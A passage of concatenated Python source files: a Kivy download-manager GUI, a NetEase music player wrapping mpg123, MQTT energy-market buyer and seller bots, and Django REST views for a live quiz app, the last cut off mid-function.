all_downloads_box.ids[sequence.get_tag()] = downloadtab
downloadtab.spacing = (dp(5), dp(5))
downloadtab.padding = (dp(3), dp(3), dp(3), dp(3))
downloadtab.pos_hint = {'x': 0, 'y': 1}
downloadtab.center_x = 0
downloadtab.size_hint = (1, None)
downloadtab.height = dp(100)
down_bg = MDCard(elevation=15)
down_bg.radius = 0
media_box = BoxLayout(orientation="vertical", size_hint=(.15, 1))
icon_box = BoxLayout(size_hint=(1, .7))
file_icon = Image(source=check_type(sequence.get_media(), sequence.get_file_extension()), size_hint=(.8, .8),
pos_hint={'x': .1, 'y': .1})
media_type_box = BoxLayout(size_hint=(1, .3))
media_type_label = Label(text=sequence.get_media(), size_hint=(1, 1))
info_box = BoxLayout(orientation="vertical", size_hint=(.8, 1))
name_label = MDLabel(text="Waiting...")
name_label.color = "E0E3E6"
direc_label = MDLabel(text=sequence.get_directory())
direc_label.color = "E0E3E6"
progress = MDProgressBar(value=0, max=100, size_hint=(1, .25))
stat_box = BoxLayout(orientation="horizontal")
state_label = MDLabel(text="State: Waiting...", size_hint=(.4, 1))
state_label.color = "E0E3E6"
size_label = Label(text="Size: -- / --", size_hint=(.4, 1), font_name="Assets/Fonts/Lcd.ttf")
speed_label = Label(text="speed: 0mbps", size_hint=(.2, 1), font_name="Assets/Fonts/Lcd.ttf", bold=True)
eta_label = Label(text="4s left", size_hint=(.2, 1))
percent_box = BoxLayout(size_hint=(.05, 1))
percent_label = Label(text="-- %", size_hint=(.05, 1), font_name="Assets/Fonts/Lcd.ttf", bold=True)
button_box = BoxLayout(orientation="vertical", size_hint=(.1, 1))
pause = Button(text="pause")
cancel_bt = Button(text="cancel")
# adding the widgets declared above
downloadtab.add_widget(down_bg)
down_bg.add_widget(media_box)
media_box.add_widget(icon_box)
icon_box.add_widget(file_icon)
media_box.add_widget(media_type_box)
media_type_box.add_widget(media_type_label)
down_bg.add_widget(info_box)
info_box.add_widget(name_label)
info_box.add_widget(direc_label)
info_box.add_widget(progress)
info_box.add_widget(stat_box)
stat_box.add_widget(state_label)
stat_box.add_widget(size_label)
stat_box.add_widget(speed_label)
stat_box.add_widget(eta_label)
down_bg.add_widget(percent_box)
percent_box.add_widget(percent_label)
down_bg.add_widget(button_box)
button_box.add_widget(pause)
button_box.add_widget(cancel_bt)
speed_time = 0
down_finish = False
down_pause = False
def update_tab(delta):
nonlocal speed_time
nonlocal down_finish
nonlocal down_pause
down_bg.md_bg_color = get_sub_theme_color("tuple")
name_label.text = sequence.get_name()
progress.color = (1, 1, 1, 1)
if not check_network_connection(use="internal"):
state_label.text = "State: Network Error"
state_label.color = "#FF0500"
speed_label.text = "- - bytes/s"
elif check_network_connection(use="internal"):
if os.path.getsize(sequence.get_file_location_name()) == sequence.get_size():
state_label.text = "State: Finished"
cancel_bt.on_press = lambda obj: do_nothing()
state_label.color = "#00DFFF"
pause.on_press = lambda obj: do_nothing()
cancel_bt.icon = "check"
pause.icon = "check"
progress.value = 100
percent_label.text = "100 %"
size_label.text = str(
get_standard_size(sequence.get_size()) + "/" + get_standard_size(sequence.get_size()))
state_label.color = "#00DFFF"
speed_label.text = "- - bytes/s"
if not down_finish:
self.finished_download(sequence.get_identifier())
down_finish = True
elif not os.path.getsize(sequence.get_file_location_name()) == sequence.get_size():
if not os.path.exists(sequence.get_error_file()):
state_label.text = "State: Downloading"
state_label.color = "#FFFFFF"
pause.on_press = lambda obj: self.pause_download(sequence.get_identifier(),
sequence.get_error_file())
progress.value = (int(
os.path.getsize(sequence.get_file_location_name())) / int(sequence.get_size())) * 100
percent_label.text = str(int(progress.value)) + " %"
size_label.text = str(
get_standard_size(os.path.getsize(sequence.get_file_location_name()))) + "/ " + str(
get_standard_size(int(sequence.get_size())))
down_pause = False
speed_time += delta
speed_label.text = str(get_standard_size(sequence.get_size() / speed_time)) + "/s"
elif os.path.exists(sequence.get_error_file()):
state_label.text = "State: Paused"
cancel_bt.on_press = lambda obj: do_nothing()
pause.on_press = lambda obj: self.resume_download(sequence)
state_label.color = "#00DFFF"
cancel_bt.disabled = True
pause.text = "Resume"
if not down_pause:
down_pause = True
self.pause_download(sequence.get_identifier(), sequence.get_error_file())
Clock.schedule_interval(update_tab, 1 / 99)
return downloadtab
def pause_download(self, identifier, error_file):
SnackBar(essence="info", message="Download Paused", bg_color=get_main_theme_color("tuple"))
self.downloads -= 1
self.paused += 1
pid = p.StorageAPI().get_unknown(identifier, "pid")
if pid in self.in_service_pids:
self.in_service_pids.pop(self.in_service_pids.index(pid))
if not os.path.exists(error_file):
open(error_file, "w")
def finished_download(self, identifier):
SnackBar(essence="info", message="Download Completed", bg_color=get_main_theme_color("tuple"))
self.downloads -= 1
self.finished += 1
process_id = p.StorageAPI().get_unknown(identifier, "pid")
self.in_service_pids.pop(self.in_service_pids.index(process_id))
if p.KeyMatch().match("beep_finish"):
threading.Thread(target=lambda: beep()).start()
else:
pass
def resume_download(self, sequence):
SnackBar(essence="info", message="Download Resumed", bg_color=get_main_theme_color("tuple"))
self.paused -= 1
self.downloads += 1
sequence.resume_download()
if os.path.exists(sequence.get_error_file()):
os.remove(sequence.get_error_file())
def populate_history(self):
for i in p.StorageAPI().get_all_ids():
self.history_tabs(i)
def history_tabs(self, identifier):
history_tab = BoxLayout()
history_tab.spacing = (dp(5), dp(5))
history_tab.padding = (dp(3), dp(3), dp(3), dp(3))
history_tab.center_x = 0
history_tab.size_hint = (1, None)
history_tab.height = dp(100)
pid = p.StorageAPI().get_unknown(identifier, "pid")
self.history_holder.ids[pid] = history_tab
down_bg = MDCard(elevation=15)
down_bg.radius = 0
info_box = BoxLayout(orientation="vertical")
name = p.StorageAPI().get_unknown(identifier, "name")
name_label = MDLabel(text=name)
name_label.color = "E0E3E6"
direc_label = MDLabel(text=p.StorageAPI().get_unknown(identifier, "directory"))
direc_label.color = "E0E3E6"
progress = MDLabel(text=shorten_string(p.StorageAPI().get_unknown(identifier, "url"), 100))
stat_box = BoxLayout(orientation="horizontal")
state_label = MDLabel(text=shorten_string(str(p.StorageAPI().get_unknown(identifier, "media")), 14), size_hint=(.1, 1))
state_label.color = "E0E3E6"
size_label = MDLabel(
text=str(get_standard_size(p.StorageAPI().get_unknown(identifier, "size"))),
size_hint=(.1, 1))
size_label.font_name = "Assets/Fonts/Lcd.ttf"
a = str(p.StorageAPI().get_unknown(identifier, "timestamp")["start_date"]) + str(
p.StorageAPI().get_unknown(identifier, "timestamp")["start_time"])
speed_label = MDLabel(text="Started at:" + a, size_hint=(.35, 1))
eta_label = MDLabel(
text="Finished at:" + str(p.StorageAPI().get_unknown(identifier, "timestamp")["finish_date"] + str(
p.StorageAPI().get_unknown(identifier, "timestamp")["finish_time"])),
size_hint=(.35, 1))
def copy_url():
data = p.StorageAPI().get_unknown(identifier, "url")
multiprocessing.Process(target=lambda :copy_data(data)).start()
SnackBar(essence="info", message="Link has been copied.", bg_color=get_sub_theme_color(essence="tuple"))
def deleting_download(obj):
str(obj)
threading.Thread(target=lambda :self.history_holder.remove_widget(self.history_holder.ids[pid])).start()
multiprocessing.Process(target=lambda: p.StorageAPI().delete_data(identifier)).start()
SnackBar(essence="extra", message="Record Deleted", bg_color=get_sub_theme_color(essence="tuple"))
threading.Thread(target=lambda :self.history_holder.clear_widgets()).start()
threading.Thread(target= lambda :self.populate_history()).start()
def delete_it():
if not p.KeyMatch().match("save_down_proc"):
deleting_download(obj=None)
elif p.KeyMatch().match("save_down_proc"):
box = PopupBox(essence="central", title="Cancel Download",
bg_color=get_sub_theme_color(essence="string"),
escape=False)
def leave(obj):
str(obj)
box.exit()
bg_back = BoxLayout(orientation="vertical")
bg_label = Label(text="Are You Sure to Delete records to this download?")
bg_back.add_widget(bg_label)
btn_box = BoxLayout(size_hint=(1, .3))
proc_bt = Button(text="Proceed", on_press=deleting_download, on_release=leave)
canc_bt = Button(text="Cancel", on_press=leave)
btn_box.add_widget(proc_bt)
btn_box.add_widget(canc_bt)
bg_back.add_widget(btn_box)
box.pop()
box.content(bg_back)
bt_box = BoxLayout(size_hint=(.04, 1), orientation="vertical")
url_paste = MDIconButton(icon="content-copy")
url_paste.on_press = copy_url
del_bt = MDIconButton(icon="delete")
del_bt.on_press = delete_it
# adding the widgets declared above
down_bg.add_widget(info_box)
info_box.add_widget(name_label)
info_box.add_widget(direc_label)
info_box.add_widget(progress)
info_box.add_widget(stat_box)
stat_box.add_widget(state_label)
stat_box.add_widget(size_label)
stat_box.add_widget(speed_label)
stat_box.add_widget(eta_label)
down_bg.add_widget(bt_box)
bt_box.add_widget(url_paste)
bt_box.add_widget(del_bt)
history_tab.add_widget(down_bg)
self.history_holder.add_widget(history_tab)
def update_tab(delta_time):
str(delta_time)
down_bg.md_bg_color = get_sub_theme_color("tuple")
Clock.schedule_interval(update_tab, 1 / 9999)
class MainApp(MDApp):
def build(self):
self.title = "Telly Download Manager"
return MainLayout()
if __name__ == "__main__":
MainApp().run()
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: omi
# @Date: 2014-07-15 15:48:27
# @Last Modified by: AlanAlbert
# @Last Modified time: 2018-11-21 14:00:00
"""
网易云音乐 Player
"""
# Let's make some noise
from __future__ import print_function, unicode_literals, division, absolute_import
import subprocess
import threading
import time
import os
import random
from future.builtins import str
# from ui import Ui
from storage import Storage
from api import NetEase
from cache import Cache
from config import Config
from utils import notify
import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
# self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.refrese_url_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database["player_info"]
@property
def songs(self):
return self.storage.database["songs"]
@property
def index(self):
return self.info["idx"]
@property
def list(self):
return self.info["player_list"]
@property
def order(self):
return self.info["playing_order"]
@property
def mode(self):
return self.info["playing_mode"]
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get("notifier")
@property
def config_mpg123(self):
return self.config.get("mpg123_parameters")
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song["song_id"]
@property
def playing_name(self):
return self.current_song["song_name"]
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
notify(
"正在播放: {}\n{}-{}".format(
song["song_name"], song["artist"], song["album_name"]
)
)
def notify_copyright_issue(self):
log.warning(
"Song {} is unavailable due to copyright issue.".format(self.playing_id)
)
notify("版权限制,无法播放此歌曲")
def change_mode(self, step=1):
self.info["playing_mode"] = (self.info["playing_mode"] + step) % 5
def build_playinfo(self):
if not self.current_song:
return
# self.ui.build_playinfo(
# self.current_song["song_name"],
# self.current_song["artist"],
# self.current_song["album_name"],
# self.current_song["quality"],
# time.time(),
# pause=not self.playing_flag,
# )
def add_songs(self, songs):
for song in songs:
song_id = str(song["song_id"])
self.info["player_list"].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def refresh_urls(self):
songs = self.api.dig_info(self.list, "refresh_urls")
if songs:
for song in songs:
song_id = str(song["song_id"])
if song_id in self.songs:
self.songs[song_id]["mp3_url"] = song["mp3_url"]
self.songs[song_id]["expires"] = song["expires"]
self.songs[song_id]["get_time"] = song["get_time"]
else:
self.songs[song_id] = song
self.refrese_url_flag = True
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b"Q\n")
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
# wait process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info["playing_volume"] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info["playing_volume"] = new_volume
self.popen_handler.stdin.write(
"V {}\n".format(self.info["playing_volume"]).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b"P\n")
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url, expires=-1, get_time=-1):
para = ["mpg123", "-R"] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b"L " + url.encode("utf-8") + b"\n")
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode("utf-8").strip()
if strout[:2] == "@F":
# playing, update progress
out = strout.split(" ")
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == "@E":
self.playing_flag = True
if (
expires >= 0
and get_time >= 0
and time.time() - expires - get_time >= 0
):
# 刷新URL
self.refresh_urls()
else:
# error, stop song and move to next
self.notify_copyright_issue()
break
elif strout == "@P 0":
# end, moving to next
self.playing_flag = True
break
elif strout == "":
endless_loop_cnt += 1
# 有播放后没有退出,mpg123一直在发送空消息的情况,此处直接终止处理
if endless_loop_cnt > 100:
log.warning(
"mpg123 error, halt, endless loop and high cpu use, then we kill it"
)
break
if self.playing_flag:
if self.refrese_url_flag:
self.stop()
self.replay()
self.refrese_url_flag = False
else:
self.next()
else:
self.stop()
def download_lyric(self, is_transalted=False):
key = "lyric" if not is_transalted else "tlyric"
if key not in self.songs[str(self.playing_id)]:
self.songs[str(self.playing_id)][key] = []
if len(self.songs[str(self.playing_id)][key]) > 0:
return
if not is_transalted:
lyric = self.api.song_lyric(self.playing_id)
else:
lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
"""
Runs the given args in subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
on_exit is a callable object, and args is a lists/tuple of args
that would give to subprocess.Popen.
"""
# log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if "cache" in args.keys() and os.path.isfile(args["cache"]):
thread = threading.Thread(
target=self.run_mpg123, args=(on_exit, args["cache"])
)
else:
new_url = NetEase().songs_url([args["song_id"]])[0]["url"] #使用新地址
if not new_url: #如果没有获得新地址
new_url = args["mp3_url"] #使用老地址传给mpg123
thread = threading.Thread(
target=self.run_mpg123,
args=(on_exit, new_url, args["expires"], args["get_time"]),
)
cache_thread = threading.Thread(
target=self.download_song,
args=(
args["song_id"],
args["song_name"],
args["artist"],
args["mp3_url"],
),
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(
target=self.download_lyric, args=(True,)
)
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug("Callback")
self.end_callback()
return
if not self.current_song:
return
self.stop()
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info["random_index"] = 0
def new_player_list(self, type, title, datalist, offset):
self.info["player_list_type"] = type
self.info["player_list_title"] = title
# self.info['idx'] = offset
self.info["player_list"] = []
self.info["playing_order"] = []
self.info["random_index"] = 0
self.songs.clear()
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
# switch_flag为true表示:
# 在播放列表中 || 当前所在列表类型不在"songs"、"djchannels"、"fmsongs"中
def play_or_pause(self, idx, switch_flag):
if self.is_empty:
return
# print('flag:',switch_flag)
# if same "list index" and "playing index" --> same song :: pause/resume it
if self.index == idx and switch_flag:
if not self.popen_handler:
# print('aaaaaa')
self.stop()
self.replay()
else:
# print('bbbbbb')
self.switch()
else:
# print('cccccccc')
self.info["idx"] = idx
self.stop()
self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info["random_index"]
if (
random_index >= len(playing_order)
or playing_order[random_index] != self.index
):
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
# make sure self.index will not over
if self.info["idx"] < playlist_len:
self.info["idx"] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
# When you regenerate playing list
# you should keep previous song same.
self._swap_song()
playing_order_len = len(self.order)
self.info["random_index"] += 1
# Out of border
if self.mode == Player.MODE_RANDOM_LOOP:
self.info["random_index"] %= playing_order_len
# Random but not loop, out of border, stop playing.
if self.info["random_index"] >= playing_order_len:
self.info["idx"] = playlist_len
else:
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info["idx"] > 0:
self.info["idx"] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.info["idx"] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
playing_order_len = len(self.order)
self.info["random_index"] -= 1
if self.info["random_index"] < 0:
if self.mode == Player.MODE_RANDOM:
self.info["random_index"] = 0
else:
self.info["random_index"] %= playing_order_len
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info["playing_mode"] = Player.MODE_RANDOM
self.shuffle_order()
self.info["idx"] = self.info["playing_order"][self.info["random_index"]]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
def update_size(self):
self.ui.update_size()
self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
|
bot.py
|
from collections import OrderedDict
from elecbay import stop_bidding
import paho.mqtt.client as mqtt
import time
import json
from random import randrange, uniform
from threading import Thread
import logging
from datetime import datetime, timedelta
class BuyerBot:
def __init__(self, id):
self.id = id
self.client = mqtt.Client("elecbay_market_buyer" + str(self.id))
self.mqttBroker = "iot.eclipse.org" # "iot.eclipse.org" #"test.mosquitto.org"
self.can_bid = False
self.approved_orders = []
self.rejected_orders = []
self.offered_items = []
def on(self):
logging.info("Thread buyer-bot-%s: starting", self.id)
self.client.on_message = self.on_message
self.client.connect(self.mqttBroker)
self.client.subscribe(
[('elecbay/item', 0), ('elecbay/order', 0), ('elecbay/bidding', 0)])
self.client.loop_start() # seperate thread for listening
time.sleep(3)
while self.can_bid:
items = self.browse()
self.bid(items)
self.clear_bidding_process()
# self.consume_energy()
def consume_energy(self):
# search a topic for energy provided
# detect if its available
logging.info(f"buyer-bot-{self.id} : has consumed energy")
def on_message(self, _client, userdata, message):
#print("received message: " ,str(message.payload.decode("utf-8")))
msg = json.loads(str(message.payload.decode("utf-8")))
if str(msg['uid']) == str(self.id) and msg['type'] == 'order':
self.process_order(msg)
if msg['type'] == 'bidding':
if msg['value'] == 'open':
self.can_bid = True
else:
self.can_bid = False
if msg['type'] == 'item':
self.process_item(msg)
def clear_bidding_process(self):
self.approved_orders = []
self.rejected_orders = []
self.offered_items = []
def bid(self, items):
for item in items:
msg = {
"uid": self.id,
"requester": "buyer-bot-" + str(self.id),
"type": "order",
"state": "pending",
"value": uniform(0.0, 10.0),
"duration": 1,
"source": item
}
order = json.dumps(msg)
self.client.publish('market/order', order)
logging.info(
f"buyer-bot-{self.id} : has placed a bid on offering from {item['requestor']}")
def browse(self):
items = []
minimum_energy_required = 1.5
for item in self.offered_items:
if item['value'] > minimum_energy_required:
start_time = datetime.strptime(item['start_time'], '%H:%M:%S')
crit_time = (datetime.now() + timedelta(seconds=5))
if start_time < crit_time:
items.append(item)
logging.info(
f"buyer-bot-{self.id} : has found an offer from {item['requestor']} for energy at {item['start_time']}.")
return items
def process_item(self, msg):
# look for offerings that fit critieria
if msg['state'] == 'accepted':
self.offered_items.append(msg)
def process_order(self, msg):
if msg['state'] == 'rejected':
self.rejected_orders.append(msg)
#print('bot[',self.id,']: ',"order was rejected, going to process")
if msg['state'] == 'accepted':
self.approved_orders.append(msg)
logging.info(
f"buyer-bot-{self.id} : bid order has been accepted ; expecting energy exchange from {msg['source']['requestor']} for {msg['source']['value']} at time {msg['source']['start_time']}")
class SellerBot:
def __init__(self, id):
self.id = id
self.client = mqtt.Client("elecbay_market_seller" + str(self.id))
self.mqttBroker = "iot.eclipse.org" # "127.0.0.1"
self.can_offer = False
self.approved_items = []
self.rejected_items = []
def on(self):
logging.info("Thread seller-bot-%s: starting", self.id)
self.client.on_message = self.on_message
self.client.connect(self.mqttBroker)
self.client.subscribe([('elecbay/item', 0), ('elecbay/bidding', 0)])
self.client.loop_start() # seperate thread for listening
time.sleep(5)
while self.can_offer:
self.offer()
time.sleep(5)
self.clear_bidding_process()
self.client.loop_stop()
def clear_bidding_process(self):
self.approved_items = []
self.rejected_items = []
def on_message(self, _client, userdata, message):
msg = json.loads(str(message.payload.decode("utf-8")))
#print("seller received message: " ,msg)
if str(msg['uid']) == str(self.id) and msg['type'] == 'item':
self.process_item(msg)
if msg['type'] == 'bidding':
if msg['value'] == 'open':
self.can_offer = True
else:
self.can_offer = False
def offer(self):
msg = {
"uid": self.id,
"requestor": "seller-bot-" + str(self.id),
"type": "item",
"state": "pending",
"value": uniform(0.0, 10.0),
"duration": 1,
"start_time": (datetime.now() + timedelta(seconds=10)).strftime('%H:%M:%S'),
"end_time": (datetime.now() + timedelta(seconds=11)).strftime('%H:%M:%S')
}
item = json.dumps(msg)
self.client.publish('market/offer', item)
logging.info(f"seller-bot-{self.id} : has published offering")
def process_item(self, msg):
if msg['state'] == 'rejected':
self.rejected_items.append(msg)
if msg['state'] == 'accepted':
self.approved_items.append(msg)
def launchBuyerBot(id):
buyer = BuyerBot(id)
buyer.on()
def launchSellerBot(id):
seller = SellerBot(id)
seller.on()
def main():
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threads = list()
for index in range(1):
logging.info("Main : create and start thread %d.", index)
x = Thread(target=launchBuyerBot, args=(index,))
y = Thread(target=launchSellerBot, args=(index + 100,))
x.setDaemon(True)
threads.append(x)
y.setDaemon(True)
threads.append(y)
x.start()
y.start()
for index, thread in enumerate(threads):
logging.info("Main : before joining thread %d.", index)
thread.join()
logging.info("Main : thread %d done", index)
if __name__ == "__main__":
main()
|
views.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from functools import wraps
from collections import defaultdict
from rest_framework import serializers, viewsets
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from django.shortcuts import render, HttpResponse
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework import status
from .models import User, UserExam
import requests
from serializers import QuestionSerializer, ChoiceSerializer
from .models import Exam, Question, Vote, Choice
from haha_api.serializers import UserSerializer, ExamSerializer, VoteSerializer, QuestionSerializer
import os
import sys
import threading
# Create your views here.
def run_async(func):
@wraps(func)
def inner(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return inner
def request_user_wrapper(func):
@wraps(func)
def inner(req):
email = req.data.get('email') or req._request.environ.get('HTTP_X_EMAIL') or req.query_params.get('email')
user = User.objects.filter(email=email).first()
if not user:
return Response("NO_EMAIL_PROVIDED_OR_NO_USER", status=status.HTTP_401_UNAUTHORIZED)
req.data['user'] = UserSerializer(user).data
req.data['user']['user_id'] = user.id
return func(req)
return inner
def ping(*args, **kwargs):
return HttpResponse("pong")
class ExamApiView(APIView):
def get(self, request, format=None):
exams = Exam.objects.all()
serializer = ExamSerializer(exams, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
class VoteApiView(APIView):
def post(self, request, format=None):
serializer = VoteSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.data, status=status.HTTP_400_BAD_REQUEST)
def push_event(data):
r = requests.post('http://localhost:3100/event', json=data, timeout=1)
r.raise_for_status()
def publish_question(event, question_id, room_id, is_last_question=False):
data = dict()
data['event'] = event
question = QuestionSerializer(Question.objects.filter(pk=question_id).first()).data
choices = [ChoiceSerializer(c).data for c in Choice.objects.filter(question=question_id).all()]
question['is_last_question'] = is_last_question
question['choices'] = choices
data['data'] = question
data['room'] = room_id
push_event(data)
class QuestionApiView(APIView):
def get(self, request, format=None):
questions = Question.objects.all()
serializer = QuestionSerializer(questions, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def post(self, request, format=None):
data = {}
try:
publish_question(request.data['event'], request.data['question_id'], request.data['question_id'])
# data['event'] = request.data['event']
# question = Question.objects.filter(pk=request.data['question_id'])
# choices = Choice.objects.filter(question__id=request.data['question_id'])
# question['choices'] = choices
# data['data'] = question
# data['room'] = request.data['exam_id']
# r = requests.post('http://localhost:3100/event', json=data)
# r.raise_for_status()
except Exception as e:
return Response(e, status=status.HTTP_400_BAD_REQUEST)
return Response(request.data, status=status.HTTP_201_CREATED)
@api_view(['POST'])
def signup(request):
if not request.data.get("email") or not request.data.get("username"):
return Response(dict(msg="Field email or username missed"), status=status.HTTP_400_BAD_REQUEST)
serializer = UserSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
data = serializer.data
# data.pop("password")
return Response(data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['POST'])
@request_user_wrapper
def join_room(request):
# from stream.haha_stream import encode_room_id
room_id = request.data.get('room_id') or request.data.get('room')
user = request.data['user']
exam = Exam.objects.filter(room_id=room_id).first()
if not exam:
return Response(dict(msg="room_id not found"), status=status.HTTP_400_BAD_REQUEST)
if not UserExam.objects.filter(user_id=user['user_id'], exam_id=exam.exam_id).first():
ue = UserExam(user_id=user['user_id'], exam_id=exam.exam_id)
ue.save()
return Response(
dict(room_id=room_id, exam=ExamSerializer(exam).data), status=status.HTTP_200_OK
)
@api_view(['GET'])
@request_user_wrapper
def current_exam(request):
room_id = request.data.get('room') or request.query_params.get('room')
exam = Exam.objects.filter(room_id=room_id).first()
if not exam:
return Response(dict(msg="room_id not found"), status=status.HTTP_400_BAD_REQUEST)
exam_data = ExamSerializer(exam).data
question = QuestionSerializer(Question.objects.filter(pk=exam_data['current_question_id']).first()).data
choices = [ChoiceSerializer(c).data for c in Choice.objects.filter(question=exam_data['current_question_id']).all()]
question['choices'] = choices
exam_data['question'] = question
return Response(exam_data, status=status.HTTP_200_OK)
@api_view(['POST'])
@request_user_wrapper
def vote(request):
user = request.data['user']
exam_id = request.data['exam_id']
choice_id = request.data['choice_id']
score = request.data['score']
exam = Exam.objects.filter(exam_id=exam_id).first()
if not exam:
return Response(dict(msg="exam not found"), status=status.HTTP_400_BAD_REQUEST)
choice = Choice.objects.filter(choice_id=choice_id).first()
if not choice:
return Response(dict(msg="choice not found"), status=status.HTTP_400_BAD_REQUEST)
vote = Vote.objects.filter(exam_id=exam.exam_id, user_id=user['user_id'], choice_id=choice.choice_id).first()
if vote:
return Response(VoteSerializer(vote).data, status=status.HTTP_200_OK)
vote = Vote(user_id=user['user_id'], exam_id=exam.exam_id, choice_id=choice.choice_id, score=int(score))
vote.save()
event_data = {
"room": exam.room_id,
"event": "user_vote",
"data": {
"user": user,
"vote": VoteSerializer(vote).data
}
}
# run_async(push_event)(event_data)
return Response(VoteSerializer(vote).data, status=status.HTTP_200_OK)
@api_view(['GET'])
def report(request):
room = request.data.get("room") or request.query_params.get('room')
if not room:
return Response(dict(msg="field `room` missed "), status=status.HTTP_400_BAD_REQUEST)
exam = Exam.objects.filter(room_id=room).first()
if not exam:
return Response(dict(msg="exam not found "), status=status.HTTP_404_NOT_FOUND)
votes = Vote.objects.filter(exam_id=exam.exam_id).all()
users = set([v.user for v in votes])
data = list()
for u in users:
total_score = sum([v.score for v in votes if v.user.email == u.email])
right_question_count = len([v for v in votes if v.user.email == u.email and v.choice.is_right])
data.append({
"email": u.email,
"total_score": total_score,
"right_question_count": right_question_count,
"username": u.username
})
return Response(data, status=status.HTTP_200_OK)
def check_choice_right(choice_id, choices):
